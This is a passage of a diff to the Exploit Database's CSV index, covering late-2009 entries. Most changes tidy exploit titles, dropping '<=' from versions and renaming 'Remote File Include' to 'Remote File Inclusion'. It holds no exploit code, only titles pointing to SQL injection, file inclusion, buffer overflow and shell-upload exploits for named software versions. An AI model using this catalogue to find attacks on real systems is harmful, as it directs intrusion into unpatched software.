Shell Upload",2009-12-05,DigitALL,php,webapps,0 10326,platforms/multiple/local/10326.txt,"Ghostscript < 8.64 - 'gdevpdtb.c' Buffer Overflow",2009-02-03,"Wolfgang Hamann",multiple,local,0 10327,platforms/multiple/dos/10327.txt,"Ghostscript 'CCITTFax' Decoding Filter - Denial of Service",2009-04-01,"Red Hat",multiple,dos,0 -10329,platforms/php/webapps/10329.txt,"AROUNDMe <= 1.1 - (language_path) Remote File Include Exploit",2009-12-06,"cr4wl3r ",php,webapps,0 +10329,platforms/php/webapps/10329.txt,"AROUNDMe 1.1 - (language_path) Remote File Inclusion Exploit",2009-12-06,"cr4wl3r ",php,webapps,0 10330,platforms/php/webapps/10330.txt,"elkagroup SQL Injection",2009-12-06,SadHaCkEr,php,webapps,0 10331,platforms/windows/webapps/10331.txt,"iWeb HTTP Server Directory Transversal",2009-12-06,mr_me,windows,webapps,0 10332,platforms/windows/local/10332.rb,"IDEAL Administration 2009 9.7 - Buffer Overflow (Metasploit)",2009-12-06,dookie,windows,local,0 10333,platforms/windows/dos/10333.py,"VLC Media Player 1.0.3 smb:// URI Handling Remote Stack Overflow PoC",2009-12-06,Dr_IDE,windows,dos,0 -10334,platforms/multiple/dos/10334.py,"VLC Media Player <= 1.0.3 RTSP Buffer Overflow PoC (OSX/Linux)",2009-12-06,Dr_IDE,multiple,dos,0 +10334,platforms/multiple/dos/10334.py,"VLC Media Player 1.0.3 RTSP Buffer Overflow PoC (OSX/Linux)",2009-12-06,Dr_IDE,multiple,dos,0 10335,platforms/windows/local/10335.rb,"HTML Help Workshop 4.74 - (.hhp) Buffer Overflow Exploit (Metasploit)",2009-12-07,loneferret,windows,local,0 10337,platforms/php/webapps/10337.txt,"Chipmunk Newsletter Persistant XSS",2009-12-07,mr_me,php,webapps,0 10338,platforms/linux/dos/10338.pl,"Polipo 1.0.4 - Remote Memory Corruption PoC (0Day)",2009-12-07,"Jeremy Brown",linux,dos,0 10339,platforms/windows/local/10339.pl,"gAlan 0.2.1 - Buffer Overflow Exploit (0Day)",2009-12-07,"Jeremy Brown",windows,local,0 10340,platforms/windows/remote/10340.pl,"Multiple Symantec Products Intel Common Base Agent Remote Command Execution",2009-04-28,kingcope,windows,remote,0 -10341,platforms/php/webapps/10341.txt,"SiSplet CMS <= 2008-01-24 - Multiple Remote File Include Exploit",2009-12-07,"cr4wl3r ",php,webapps,0 +10341,platforms/php/webapps/10341.txt,"SiSplet CMS 2008-01-24 - Multiple Remote File Inclusion Exploit",2009-12-07,"cr4wl3r ",php,webapps,0 10343,platforms/windows/dos/10343.txt,"Kingsoft Internet Security 9 - Denial of Services",2009-11-05,"Francis Provencher",windows,dos,0 10344,platforms/windows/local/10344.rb,"Adobe Illustrator CS4 14.0.0 - eps Universal Buffer Overflow (Metasploit)",2009-12-07,dookie,windows,local,0 10345,platforms/windows/local/10345.py,"gAlan - (.galan) Universal Buffer Overflow Exploit",2009-12-07,Dz_attacker,windows,local,0 10346,platforms/windows/local/10346.rb,"gAlan 0.2.1 - Universal Buffer Overflow Exploit (Metasploit)",2009-12-07,loneferret,windows,local,0 10347,platforms/hardware/webapps/10347.txt,"Barracuda IMFirewall 620",2009-12-07,Global-Evolution,hardware,webapps,0 -10349,platforms/linux/dos/10349.py,"CoreHTTP Web server <= 0.5.3.1 - off-by-one Buffer Overflow",2009-12-02,"Patroklos Argyroudis",linux,dos,80 +10349,platforms/linux/dos/10349.py,"CoreHTTP Web server 0.5.3.1 - off-by-one Buffer Overflow",2009-12-02,"Patroklos Argyroudis",linux,dos,80 10350,platforms/php/webapps/10350.txt,"IRAN N.E.T E-commerce Group SQL Injection",2009-12-08,"Dr.0rYX AND Cr3W-DZ",php,webapps,0 10351,platforms/php/webapps/10351.txt,"MarieCMS 0.9 - LFI / RFI / XSS Vulnerabilities",2009-12-07,"Amol Naik",php,webapps,0 10352,platforms/hardware/dos/10352.txt,"TANDBERG F8.2 / F8.0 / F7.2 / F6.3 - Remote Denial of Service",2009-12-06,otokoyama,hardware,dos,0 10353,platforms/windows/local/10353.pl,"Audio Workstation - (.pls) Local Buffer Overflow Exploit (SEH)",2009-09-24,germaya_x,windows,local,0 10354,platforms/php/webapps/10354.txt,"Viscacha 0.8 Gold persistant XSS",2009-12-08,mr_me,php,webapps,0 10356,platforms/php/webapps/10356.txt,"Joomla Component com_job (showMoreUse) SQL Injection",2009-12-08,Palyo34,php,webapps,0 -10357,platforms/php/webapps/10357.txt,"Alqatari group 1.0 <= 5.0 - (id) Remote SQL Injection",2009-12-08,Red-D3v1L,php,webapps,0 -10358,platforms/php/webapps/10358.txt,"AlefMentor 2.0 <= 5.0 - (id) Remote SQL Injection",2009-12-08,Red-D3v1L,php,webapps,0 +10357,platforms/php/webapps/10357.txt,"Alqatari group 1.0 <= 5.0 - (id) SQL Injection",2009-12-08,Red-D3v1L,php,webapps,0 +10358,platforms/php/webapps/10358.txt,"AlefMentor 2.0 <= 5.0 - (id) SQL Injection",2009-12-08,Red-D3v1L,php,webapps,0 10359,platforms/windows/local/10359.py,"Audio Workstation 6.4.2.4.0 - (.pls) Universal Local BoF Exploit",2009-12-09,mr_me,windows,local,0 -10361,platforms/php/webapps/10361.txt,"Real Estate Portal X.0 - (Auth Bypass) Remote SQL Injection",2009-12-09,"AnTi SeCuRe",php,webapps,0 +10361,platforms/php/webapps/10361.txt,"Real Estate Portal X.0 - (Auth Bypass) SQL Injection",2009-12-09,"AnTi SeCuRe",php,webapps,0 10362,platforms/hardware/remote/10362.txt,"THOMSON TG585n 7.4.3.2 - (user.ini) Arbitrary Download",2009-12-09,"AnTi SeCuRe",hardware,remote,0 10363,platforms/windows/local/10363.rb,"Audio Workstation 6.4.2.4.3 pls Buffer Overflow (Metasploit)",2009-12-09,dookie,windows,local,0 10364,platforms/php/webapps/10364.txt,"TestLink Test Management and Execution System - Multiple XSS and Injection Vulnerabilities",2009-12-09,"Core Security",php,webapps,0 @@ -9645,7 +9645,7 @@ id,file,description,date,author,platform,type,port 10366,platforms/php/webapps/10366.txt,"Joomla Component com_jsjobs 1.0.5.6 - SQL Injection Vulnerabilities",2009-12-10,kaMtiEz,php,webapps,0 10367,platforms/php/webapps/10367.txt,"Joomla Component com_jphoto SQL Injection - (id)",2009-12-10,kaMtiEz,php,webapps,0 10368,platforms/asp/webapps/10368.txt,"Free ASP Upload Shell Upload",2009-12-10,Mr.aFiR,asp,webapps,0 -10369,platforms/php/webapps/10369.txt,"Joomla! Mamboleto Component 2.0 RC3 - Remote File Include Vulneralbility",2009-12-10,"Don Tukulesto",php,webapps,0 +10369,platforms/php/webapps/10369.txt,"Joomla! Mamboleto Component 2.0 RC3 - Remote File Inclusion Vulneralbility",2009-12-10,"Don Tukulesto",php,webapps,0 10370,platforms/php/webapps/10370.txt,"PHP Inventory 1.2 - Remote (Auth Bypass) SQL Injection Vulnerabiity",2009-12-10,mr_me,php,webapps,0 10371,platforms/windows/local/10371.pl,"Xenorate 2.50 - (.xpl) universal Local Buffer Overflow Exploit (SEH) (1)",2009-12-10,germaya_x,windows,local,0 10372,platforms/aix/webapps/10372.txt,"OPMANAGER - Blind SQL/XPath injectio",2009-12-10,"Asheesh kumar Mani Tripathi",aix,webapps,0 @@ -9686,9 +9686,9 @@ id,file,description,date,author,platform,type,port 10419,platforms/php/webapps/10419.txt,"Chipmunk Board Script 1.x - Multiple CSRF Vulnerabilities",2009-12-13,"Milos Zivanovic ",php,webapps,0 10420,platforms/php/webapps/10420.txt,"Ez Guestbook 1.0 - Multiple Vulnerabilities",2009-12-14,"Milos Zivanovic ",php,webapps,0 10421,platforms/php/webapps/10421.txt,"Automne.ws CMS 4.0.0rc2 - Multiple RFI",2009-12-14,"1nd0n3s14n l4m3r",php,webapps,0 -10422,platforms/php/webapps/10422.txt,"eoCMS <= 0.9.03 - Remote FIle Include",2009-12-14,"1nd0n3s14n l4m3r",php,webapps,0 +10422,platforms/php/webapps/10422.txt,"eoCMS 0.9.03 - Remote File Inclusion",2009-12-14,"1nd0n3s14n l4m3r",php,webapps,0 10423,platforms/windows/local/10423.pl,"RM Downloader 3.0.2.1 - (.M3U) Stack Overflow Exploit",2009-12-14,"Vinod Sharma",windows,local,0 -10424,platforms/multiple/webapps/10424.txt,"Redmine <= 0.8.6 - CSRF Add Admin User Exploit",2009-12-14,p0deje,multiple,webapps,0 +10424,platforms/multiple/webapps/10424.txt,"Redmine 0.8.6 - CSRF Add Admin User Exploit",2009-12-14,p0deje,multiple,webapps,0 10425,platforms/asp/webapps/10425.txt,"Quartz Concept Content Manager 3.00 - Auth Bypass",2009-12-14,Mr.aFiR,asp,webapps,0 10426,platforms/linux/webapps/10426.txt,"[WS] upload - Remote File Upload",2009-12-14,"ViRuSMaN ",linux,webapps,80 10427,platforms/linux/webapps/10427.txt,"DigitalHive - Multiple Vulnerabilities",2009-12-14,"ViRuSMaN ",linux,webapps,80 @@ -9716,7 +9716,7 @@ id,file,description,date,author,platform,type,port 10452,platforms/php/webapps/10452.txt,"Ez News Manager / Pro CSRF Change Admin Password",2009-12-15,"Milos Zivanovic ",php,webapps,0 10453,platforms/php/webapps/10453.txt,"SitioOnline SQL Injection",2009-12-15,4lG3r14n0-t3r0,php,webapps,0 10454,platforms/php/webapps/10454.txt,"Ez Faq Maker - Multiple Vulnerabilities",2009-12-15,"Milos Zivanovic ",php,webapps,0 -10455,platforms/asp/webapps/10455.txt,"DesigNsbyjm CMS <= 1.0 - (PageId) Remote SQL Injection",2009-12-15,Red-D3v1L,asp,webapps,0 +10455,platforms/asp/webapps/10455.txt,"DesigNsbyjm CMS 1.0 - (PageId) SQL Injection",2009-12-15,Red-D3v1L,asp,webapps,0 10456,platforms/asp/webapps/10456.txt,"ClickTrackerASP(sitedetails.asp siteid) SQL Injection",2009-12-15,R3d-D3V!L,asp,webapps,0 10457,platforms/asp/webapps/10457.txt,"LinkPal 1.0 - SQL Injection",2009-12-15,R3d-D3V!L,asp,webapps,0 10458,platforms/php/webapps/10458.txt,"Ez Blog 1.0 - (XSS/CSRF) Multiple Vulnerabilities",2009-12-15,"Milos Zivanovic ",php,webapps,0 @@ -9725,7 +9725,7 @@ id,file,description,date,author,platform,type,port 10463,platforms/php/webapps/10463.txt,"iGaming CMS 1.5 - CSRF",2009-12-15,Nex,php,webapps,0 10464,platforms/asp/webapps/10464.txt,"GalleryPal FE 1.5 - Auth Bypass",2009-12-15,R3d-D3V!L,asp,webapps,0 10465,platforms/asp/webapps/10465.txt,"SitePal 1.1 - (Auth Bypass) SQL Injection",2009-12-15,R3d-D3V!L,asp,webapps,0 -10467,platforms/php/webapps/10467.txt,"family connections <= 2.1.3 - Multiple Vulnerabilities",2009-12-16,"Salvatore Fresta",php,webapps,0 +10467,platforms/php/webapps/10467.txt,"family connections 2.1.3 - Multiple Vulnerabilities",2009-12-16,"Salvatore Fresta",php,webapps,0 10469,platforms/linux/dos/10469.py,"Monkey HTTP Daemon < 0.9.3 - Denial of Service",2009-12-16,"Patroklos Argyroudis",linux,dos,80 10470,platforms/asp/webapps/10470.txt,"JM CMS 1.0 <= 1.0 - (Auth Bypass) SQL Injection",2009-12-16,Red-D3v1L,asp,webapps,0 10472,platforms/php/webapps/10472.txt,"Recipe Script 5.0 - (Shell Upload/CSRF/XSS) Multiple Vulnerabilities",2009-12-16,"Milos Zivanovic ",php,webapps,0 @@ -9733,7 +9733,7 @@ id,file,description,date,author,platform,type,port 10474,platforms/php/webapps/10474.txt,"Article Directory SQL Injection",2009-12-16,R3d-D3V!L,php,webapps,0 10475,platforms/windows/local/10475.txt,"QuickHeal antivirus 2010 - Local Privilege Escalation",2009-12-16,"Francis Provencher",windows,local,0 10476,platforms/asp/webapps/10476.txt,"RecipePal 1.0 - SQL Injection",2009-12-16,R3d-D3V!L,asp,webapps,0 -10478,platforms/php/webapps/10478.txt,"iSupport <= 1.8 - XSS/LFI Exploit",2009-12-16,"Stink and Essandre",php,webapps,0 +10478,platforms/php/webapps/10478.txt,"iSupport 1.8 - XSS/LFI Exploit",2009-12-16,"Stink and Essandre",php,webapps,0 10479,platforms/php/webapps/10479.txt,"OSSIM 2.1.5 - SQL Injection",2009-12-16,"Nahuel Grisolia",php,webapps,0 10480,platforms/php/webapps/10480.txt,"OSSIM 2.1.5 - Remote Command Execution",2009-12-16,"Nahuel Grisolia",php,webapps,0 10481,platforms/php/webapps/10481.txt,"OSSIM 2.1.5 - Arbitrary File Upload",2009-12-16,"Nahuel Grisolia",php,webapps,0 @@ -9743,7 +9743,7 @@ id,file,description,date,author,platform,type,port 10485,platforms/php/webapps/10485.txt,"Drupal Sections Module XSS",2009-12-16,"Justin C. Klein Keane",php,webapps,0 14034,platforms/windows/dos/14034.pl,"Wincalc 2 - (.num) Local Buffer Overflow PoC",2010-06-24,Madjix,windows,dos,0 10487,platforms/linux/local/10487.txt,"VideoCache 1.9.2 vccleaner Root",2009-12-16,"Dominick LaTrappe",linux,local,0 -10488,platforms/php/webapps/10488.txt,"WP-Forum <= 2.3 - SQL Injection & Blind SQL Injection Vulnerabilities",2009-12-16,"Juan Galiana Lara",php,webapps,0 +10488,platforms/php/webapps/10488.txt,"WP-Forum 2.3 - SQL Injection & Blind SQL Injection Vulnerabilities",2009-12-16,"Juan Galiana Lara",php,webapps,0 10489,platforms/windows/dos/10489.txt,"Google Picasa 3.5 - Local DoS Buffer Overflow",2009-12-16,Connection,windows,dos,0 10492,platforms/php/webapps/10492.txt,"Pre Hospital Management System (auth bypass) SQL Injection",2009-12-16,R3d-D3V!L,php,webapps,0 10493,platforms/php/webapps/10493.txt,"WHMCompleteSolution CMS SQL Injection",2009-12-16,"Dr.0rYX AND Cr3W-DZ",php,webapps,0 @@ -9754,13 +9754,13 @@ id,file,description,date,author,platform,type,port 10498,platforms/php/webapps/10498.txt,"Pre Hospital Management System (department.php id) SQL Injection",2009-12-16,R3d-D3V!L,php,webapps,0 10499,platforms/php/webapps/10499.txt,"eUploader PRO 3.1.1 - (CSRF/XSS) Multiple Vulnerabilities",2009-12-16,"Milos Zivanovic ",php,webapps,0 10500,platforms/php/webapps/10500.txt,"Omnistar Affiliate (Auth Bypass) SQL Injection",2009-12-16,R3d-D3V!L,php,webapps,0 -10501,platforms/asp/webapps/10501.txt,"Texas Rankem(player.asp player_id) Remote SQL Injection",2009-12-16,R3d-D3V!L,asp,webapps,0 -10502,platforms/asp/webapps/10502.txt,"PRE HOTELS&RESORTS MANAGEMENT SYSTEM(Auth Bypass) Remote SQL Injection",2009-12-16,R3d-D3V!L,asp,webapps,0 +10501,platforms/asp/webapps/10501.txt,"Texas Rankem(player.asp player_id) SQL Injection",2009-12-16,R3d-D3V!L,asp,webapps,0 +10502,platforms/asp/webapps/10502.txt,"PRE HOTELS&RESORTS MANAGEMENT SYSTEM(Auth Bypass) SQL Injection",2009-12-16,R3d-D3V!L,asp,webapps,0 10503,platforms/asp/webapps/10503.txt,"ASPGuest (edit.asp ID) Blind SQL Injection",2009-12-16,R3d-D3V!L,asp,webapps,0 10504,platforms/asp/webapps/10504.txt,"Smart ASPad(campaignEdit.asp CCam) Blind SQL Injection",2009-12-16,R3d-D3V!L,asp,webapps,0 10505,platforms/asp/webapps/10505.txt,"Multi-Lingual Application Blind SQL Injection",2009-12-17,R3d-D3V!L,asp,webapps,0 10507,platforms/asp/webapps/10507.txt,"Charon Cart 3.0 - (ContentID) Blind SQL Injection",2009-12-17,R3d-D3V!L,asp,webapps,0 -10510,platforms/hardware/remote/10510.txt,"Cisco ASA <= 8.x VPN SSL module Clientless URL-list control bypass",2009-12-17,"David Eduardo Acosta Rodriguez",hardware,remote,0 +10510,platforms/hardware/remote/10510.txt,"Cisco ASA 8.x VPN SSL module Clientless URL-list control bypass",2009-12-17,"David Eduardo Acosta Rodriguez",hardware,remote,0 10511,platforms/php/webapps/10511.txt,"PHP F1 Upload Shell Upload",2009-12-17,"wlhaan hacker",php,webapps,0 10512,platforms/php/webapps/10512.txt,"Horde 3.3.5 - 'PHP_SELF' XSS",2009-12-17,"Juan Galiana Lara",php,webapps,0 10513,platforms/windows/webapps/10513.txt,"Sitecore Staging Module 5.4.0 - Authentication bypass and File Manipulation",2009-12-17,"L. Weichselbaum",windows,webapps,0 @@ -9769,21 +9769,21 @@ id,file,description,date,author,platform,type,port 10516,platforms/php/webapps/10516.txt,"Jobscript4Web 3.5 - Multiple CSRF",2009-12-17,bi0,php,webapps,0 10517,platforms/php/webapps/10517.txt,"Matrimony Script CSRF",2009-12-17,bi0,php,webapps,0 10520,platforms/asp/webapps/10520.txt,"Active Auction House 3.6 - Blind SQL Injection",2009-12-17,R3d-D3V!L,asp,webapps,0 -10521,platforms/asp/webapps/10521.txt,"Active Photo Gallery 6.2 - (Auth Bypass) Remote SQL Injection",2009-12-17,R3d-D3V!L,asp,webapps,0 +10521,platforms/asp/webapps/10521.txt,"Active Photo Gallery 6.2 - (Auth Bypass) SQL Injection",2009-12-17,R3d-D3V!L,asp,webapps,0 10522,platforms/php/webapps/10522.txt,"Pre Job Board 1.0 SQL Bypass",2009-12-17,bi0,php,webapps,0 10523,platforms/php/webapps/10523.txt,"Uploader by CeleronDude 5.3.0 Shell Upload",2009-12-17,Stink,php,webapps,0 10525,platforms/asp/webapps/10525.txt,"Pre Jobo .NET SQL Bypass",2009-12-17,bi0,asp,webapps,0 10526,platforms/asp/webapps/10526.txt,"ActiveBuyandSell 6.2 - (buyersend.asp catid) Blind SQL Injection",2009-12-17,R3d-D3V!L,asp,webapps,0 -10527,platforms/php/webapps/10527.txt,"ReVou Software Remote SQL Injection",2009-12-17,R3d-D3V!L,php,webapps,0 -10528,platforms/php/webapps/10528.txt,"V.H.S. Booking (hotel_habitaciones.php HotelID) Remote SQL Injection",2009-12-17,R3d-D3V!L,php,webapps,0 +10527,platforms/php/webapps/10527.txt,"ReVou Software SQL Injection",2009-12-17,R3d-D3V!L,php,webapps,0 +10528,platforms/php/webapps/10528.txt,"V.H.S. Booking (hotel_habitaciones.php HotelID) SQL Injection",2009-12-17,R3d-D3V!L,php,webapps,0 10529,platforms/asp/webapps/10529.txt,"eWebquiz 8 - Blind SQL Injection",2009-12-17,R3d-D3V!L,asp,webapps,0 10531,platforms/php/webapps/10531.txt,"jCore CMS Cross-Site Scripting",2009-12-17,loneferret,php,webapps,0 10532,platforms/php/webapps/10532.txt,"Piwik Open Flash Chart - Remote Code Execution",2009-12-17,"Braeden Thomas",php,webapps,0 10533,platforms/php/webapps/10533.txt,"VirtueMart 'product_id' Parameter SQL Injection",2009-12-17,Neo-GabrieL,php,webapps,0 10534,platforms/php/webapps/10534.txt,"Rumba XML suffers from a Cross-Site scripting",2009-12-17,"Hadi Kiamarsi",php,webapps,0 10535,platforms/php/webapps/10535.txt,"WordPress and Pyrmont 2.x - SQL Injection",2009-12-18,Gamoscu,php,webapps,0 -10537,platforms/php/webapps/10537.txt,"gpEasy <= 1.5RC3 - Remote FIle Include Exploit",2009-12-18,"cr4wl3r ",php,webapps,0 -10540,platforms/asp/webapps/10540.txt,"E-Smartcart Remote SQL Injection",2009-12-18,R3d-D3V!L,asp,webapps,0 +10537,platforms/php/webapps/10537.txt,"gpEasy 1.5RC3 - Remote File Inclusion Exploit",2009-12-18,"cr4wl3r ",php,webapps,0 +10540,platforms/asp/webapps/10540.txt,"E-Smartcart SQL Injection",2009-12-18,R3d-D3V!L,asp,webapps,0 10542,platforms/windows/remote/10542.py,"TFTP Server 1.4 - Buffer Overflow Remote Exploit (2)",2009-12-18,Molotov,windows,remote,69 10543,platforms/php/webapps/10543.txt,"Schweizer NISADA Communication CMS SQL Injection",2009-12-18,"Dr.0rYX AND Cr3W-DZ",php,webapps,0 10544,platforms/multiple/local/10544.html,"Mozilla Firefox Location Bar Spoofing",2009-12-18,"Jordi Chancel",multiple,local,0 @@ -9793,7 +9793,7 @@ id,file,description,date,author,platform,type,port 10548,platforms/php/webapps/10548.txt,"Joomla Component com_zcalendar Blind SQL-injection",2009-12-18,FL0RiX,php,webapps,0 10549,platforms/php/webapps/10549.txt,"Joomla Component Event Manager Blind SQL Injection",2009-12-18,FL0RiX,php,webapps,0 10550,platforms/php/webapps/10550.txt,"Joomla Component City Portal Blind SQL Injection",2009-12-18,FL0RiX,php,webapps,0 -10552,platforms/php/webapps/10552.txt,"FestOs <= 2.2.1 - Multiple RFI Exploit",2009-12-19,"cr4wl3r ",php,webapps,0 +10552,platforms/php/webapps/10552.txt,"FestOs 2.2.1 - Multiple Remote File Inclusion Exploits",2009-12-19,"cr4wl3r ",php,webapps,0 10553,platforms/hardware/dos/10553.rb,"3Com OfficeConnect Routers - Remote DoS Exploit",2009-12-19,"Alberto Ortega Llamas",hardware,dos,0 10555,platforms/php/webapps/10555.txt,"Barracuda Web Firewall 660 Firmware 7.3.1.007",2009-12-19,Global-Evolution,php,webapps,0 10556,platforms/windows/local/10556.c,"PlayMeNow 7.3 / 7.4 - Malformed M3U Playlist File Buffer",2009-12-19,Gr33nG0bL1n,windows,local,0 @@ -9801,16 +9801,16 @@ id,file,description,date,author,platform,type,port 10558,platforms/asp/webapps/10558.txt,"Toast Forums 1.8 - Database Disclosure",2009-12-19,"ViRuSMaN ",asp,webapps,0 10560,platforms/php/webapps/10560.txt,"Lizard Cart Multiple SQL Injection Exploit",2009-12-19,"cr4wl3r ",php,webapps,0 10561,platforms/php/webapps/10561.txt,"CFAGCMS SQL Injection Exploit",2009-12-19,"cr4wl3r ",php,webapps,0 -10562,platforms/php/webapps/10562.txt,"Ptag <= 4.0.0 - Multiple RFI Exploit",2009-12-19,"cr4wl3r ",php,webapps,0 +10562,platforms/php/webapps/10562.txt,"Ptag 4.0.0 - Multiple Remote File Inclusion Exploits",2009-12-19,"cr4wl3r ",php,webapps,0 10563,platforms/windows/local/10563.py,"PlayMeNow - Malformed M3U Playlist BOF (Windows XP Universal)",2009-12-19,loneferret,windows,local,0 -10564,platforms/php/webapps/10564.txt,"SaurusCMS <= 4.6.4 - Multiple RFI Exploit",2009-12-19,"cr4wl3r ",php,webapps,0 +10564,platforms/php/webapps/10564.txt,"SaurusCMS 4.6.4 - Multiple Remote File Inclusion Exploits",2009-12-19,"cr4wl3r ",php,webapps,0 10566,platforms/php/webapps/10566.txt,"Explorer 7.20 - Cross-Site Scripting",2009-12-20,Metropolis,php,webapps,0 -10567,platforms/php/webapps/10567.txt,"Advance Biz Limited <= 1.0 - (Auth Bypass) SQL Injection",2009-12-20,PaL-D3v1L,php,webapps,0 +10567,platforms/php/webapps/10567.txt,"Advance Biz Limited 1.0 - (Auth Bypass) SQL Injection",2009-12-20,PaL-D3v1L,php,webapps,0 10568,platforms/php/webapps/10568.txt,"Simplicity oF Upload 1.3.2 - Remote File Upload",2009-12-20,"Master Mind",php,webapps,0 10569,platforms/php/webapps/10569.txt,"Ignition 1.2 - Multiple Local File Inclusion Vulnerabilities",2009-12-20,cOndemned,php,webapps,0 10570,platforms/php/webapps/10570.txt,"Pandora Fms Monitoring Z0D",2009-12-20,Global-Evolution,php,webapps,0 10571,platforms/php/webapps/10571.txt,"PacketFence Network Access Controller XSS",2009-12-20,K053,php,webapps,0 -10572,platforms/php/webapps/10572.txt,"4Images 1.7.1 - Remote SQL Injection",2009-12-20,"Master Mind",php,webapps,0 +10572,platforms/php/webapps/10572.txt,"4Images 1.7.1 - SQL Injection",2009-12-20,"Master Mind",php,webapps,0 10573,platforms/asp/webapps/10573.txt,"8pixel.net 2009. - Database Disclosure",2009-12-20,LionTurk,asp,webapps,0 10574,platforms/php/webapps/10574.txt,"phUploader 2 - Remote File Upload",2009-12-20,wlhaan-hacker,php,webapps,0 10575,platforms/php/webapps/10575.txt,"Drumbeat CMS 1.0 - SQL Injection Exploit",2009-12-21,Sora,php,webapps,0 @@ -9820,21 +9820,21 @@ id,file,description,date,author,platform,type,port 10579,platforms/multiple/remote/10579.py,"TLS Renegotiation PoC",2009-12-21,"RedTeam Pentesting",multiple,remote,0 10580,platforms/hardware/dos/10580.rb,"3Com OfficeConnect Routers - DoS (Content-Type)",2009-12-21,"Alberto Ortega",hardware,dos,0 10582,platforms/asp/webapps/10582.txt,"Absolute Shopping Cart SQL Injection",2009-12-21,Gamoscu,asp,webapps,0 -10583,platforms/php/webapps/10583.txt,"social Web CMS <= beta 2 - Multiple Vulnerabilities",2009-12-21,"cp77fk4r ",php,webapps,0 +10583,platforms/php/webapps/10583.txt,"social Web CMS beta 2 - Multiple Vulnerabilities",2009-12-21,"cp77fk4r ",php,webapps,0 10584,platforms/php/webapps/10584.txt,"PHPhotoalbum Remote File Upload",2009-12-21,"wlhaan hacker",php,webapps,0 10585,platforms/php/webapps/10585.txt,"webCocoon's simpleCMS SQL Injection",2009-12-21,_ÝNFAZCI_,php,webapps,0 10586,platforms/php/webapps/10586.txt,"VideoCMS 3.1 - SQL Injection",2009-12-21,kaMtiEz,php,webapps,0 10587,platforms/php/webapps/10587.txt,"Joomla Component com_jcalpro 1.5.3.6 - Remote File Inclusion",2009-12-13,kaMtiEz,php,webapps,0 -10588,platforms/php/webapps/10588.txt,"PDQ Script <= 1.0 - (listingid) SQL Injection",2009-12-21,SecurityRules,php,webapps,0 +10588,platforms/php/webapps/10588.txt,"PDQ Script 1.0 - (listingid) SQL Injection",2009-12-21,SecurityRules,php,webapps,0 10590,platforms/php/webapps/10590.txt,"PHPhotoalbum 0.5 - SQL Injection",2009-12-21,Stack,php,webapps,0 10591,platforms/php/webapps/10591.txt,"Joomla Component com_mediaslide Directory Traversal",2009-12-21,Mr.tro0oqy,php,webapps,0 10592,platforms/php/webapps/10592.txt,"PHPOPENCHAT 3.0.2 - Cross-Site Scripting AND/OR FPD",2009-12-21,Dedalo,php,webapps,0 -10593,platforms/windows/dos/10593.txt,"Winamp <= 5.57 - Stack Overflow",2009-12-22,scriptjunkie,windows,dos,0 +10593,platforms/windows/dos/10593.txt,"Winamp 5.57 - Stack Overflow",2009-12-22,scriptjunkie,windows,dos,0 10594,platforms/php/webapps/10594.txt,"The Uploader 2.0 - Remote File Upload",2009-12-22,"Master Mind",php,webapps,0 10595,platforms/windows/local/10595.pl,"CoolPlayer 2.18 - M3U Playlist Buffer Overflow Exploit",2009-12-22,data$hack,windows,local,0 10596,platforms/windows/local/10596.pl,"PlayMeNow - Malformed (M3U) Universal XP Seh BoF",2009-12-22,"ThE g0bL!N",windows,local,0 10597,platforms/php/webapps/10597.txt,"Active PHP Bookmarks 1.3 - SQL Injection",2009-12-22,Mr.Elgaarh,php,webapps,0 -10598,platforms/php/webapps/10598.txt,"deluxebb <= 1.3 - Multiple Vulnerabilities",2009-12-22,"cp77fk4r ",php,webapps,0 +10598,platforms/php/webapps/10598.txt,"deluxebb 1.3 - Multiple Vulnerabilities",2009-12-22,"cp77fk4r ",php,webapps,0 10599,platforms/php/webapps/10599.txt,"The Uploader 2.0 File Disclosure",2009-12-22,Stack,php,webapps,0 10600,platforms/php/webapps/10600.txt,"mypage 0.4 - Local File Inclusion",2009-12-22,BAYBORA,php,webapps,0 10601,platforms/php/webapps/10601.txt,"Mini File Host 1.5 - Remote File Upload",2009-12-22,MR.Z,php,webapps,0 @@ -9842,7 +9842,7 @@ id,file,description,date,author,platform,type,port 10603,platforms/windows/dos/10603.c,"TFTP Daemon 1.9 - Denial of Service Exploit",2009-12-22,Socket_0x03,windows,dos,0 10604,platforms/php/webapps/10604.pl,"Simple PHP Blog 0.5.1 - Local File Inclusion",2009-12-22,jgaliana,php,webapps,0 10606,platforms/php/webapps/10606.txt,"weenCompany SQL Injection",2009-12-22,Gamoscu,php,webapps,0 -10609,platforms/php/webapps/10609.txt,"Aurora CMS Remote SQL Injection Exploit",2009-12-22,Sora,php,webapps,0 +10609,platforms/php/webapps/10609.txt,"Aurora CMS SQL Injection Exploit",2009-12-22,Sora,php,webapps,0 10610,platforms/linux/remote/10610.rb,"CoreHTTP 0.5.3.1 - (CGI) Arbitrary Command Execution",2009-12-23,"Aaron Conole",linux,remote,0 10611,platforms/php/webapps/10611.txt,"35mm Slide Gallery - Cross-Site Scripting",2009-12-23,indoushka,php,webapps,0 10612,platforms/php/webapps/10612.txt,"Add An Ad Script Remote File Upload",2009-12-23,MR.Z,php,webapps,0 @@ -9862,7 +9862,7 @@ id,file,description,date,author,platform,type,port 10630,platforms/multiple/webapps/10630.txt,"ImageVue 2.0 - Remote Admin Login Exploit",2009-12-24,Sora,multiple,webapps,0 10632,platforms/php/webapps/10632.pl,"Wbb3 - Blind SQL Injection",2009-12-24,molli,php,webapps,0 10633,platforms/php/webapps/10633.txt,"Pragyan CMS 2.6.4 - (Search.php) Remote File Inclusion",2009-12-24,Mr.SeCreT,php,webapps,0 -10634,platforms/linux/dos/10634.txt,"Picpuz <= 2.1.1 - Buffer Overflow DoS/PoC",2009-12-24,sandman,linux,dos,0 +10634,platforms/linux/dos/10634.txt,"Picpuz 2.1.1 - Buffer Overflow DoS/PoC",2009-12-24,sandman,linux,dos,0 10637,platforms/asp/webapps/10637.txt,"Web Wiz NewsPad Database Disclosure",2009-12-24,"ViRuSMaN ",asp,webapps,0 10638,platforms/asp/webapps/10638.txt,"Web Wiz Forums 9.64 - Database Disclosure",2009-12-24,"ViRuSMaN ",asp,webapps,0 10639,platforms/asp/webapps/10639.txt,"Snitz Forums 2000 Database Disclosure",2009-12-24,"ViRuSMaN ",asp,webapps,0 @@ -9871,11 +9871,11 @@ id,file,description,date,author,platform,type,port 10645,platforms/php/webapps/10645.txt,"PBX Phone System 2.x - Multiple Vulnerabilities",2009-12-24,Global-Evolution,php,webapps,0 10646,platforms/windows/local/10646.c,"CastRipper - (.M3U) Stack BoF (Windows XP SP2)",2009-12-24,bibi-info,windows,local,0 10647,platforms/php/webapps/10647.txt,"VideoIsland 